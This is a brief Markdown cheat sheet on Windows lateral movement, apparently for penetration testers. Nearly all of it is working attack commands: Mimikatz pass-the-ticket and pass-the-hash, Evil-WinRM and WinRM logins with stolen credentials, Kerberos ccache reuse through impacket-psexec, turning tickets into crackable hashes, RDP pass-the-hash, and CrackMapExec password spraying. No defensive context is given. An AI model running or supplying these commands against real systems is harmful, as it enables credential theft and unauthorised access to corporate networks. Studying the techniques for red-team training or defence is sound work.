# Lateral Movement

There aren't many ways to move laterally on Windows. Below are the main ones.

- psexec
- RDP
- WinRM
- SSH (not likely)

PTH (pass the hash) can be used most of the time.
## Mimikatz Ticket PTT

```powershell
Enable-PSRemoting
mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
Enter-PSSession -ComputerName ECORP
```
## WinRM

```powershell
$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }
```

Evil-WinRM (https://github.com/Hackplayers/evil-winrm):

```bash
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp
```
## PTH with Mimikatz

```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'
```
## Pass The Ccache (PTC)

Grab the ccache from the remote host and put it into an environment variable:

```bash
export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX
```

Make sure the time is synced up with the DC:

```bash
sudo ntpdate -u 192.168.1.231
```

Psexec to the target:

```bash
impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass
```

**Note:** Don't include the domain name in the psexec command. If you are having issues with the command, you may remove the username as well.
## Cracking Ccache

Convert the ccache file into a kirbi file using a converter:

```bash
python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi
```

Convert the kirbi to a crackable hash:

```bash
python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt
```
## RDP

Impacket's rdp_check.py script is good.

```bash
impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456
```
## CrackMapExec

Swiss-army-knife tool, used here for password spraying.

```bash
crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares
```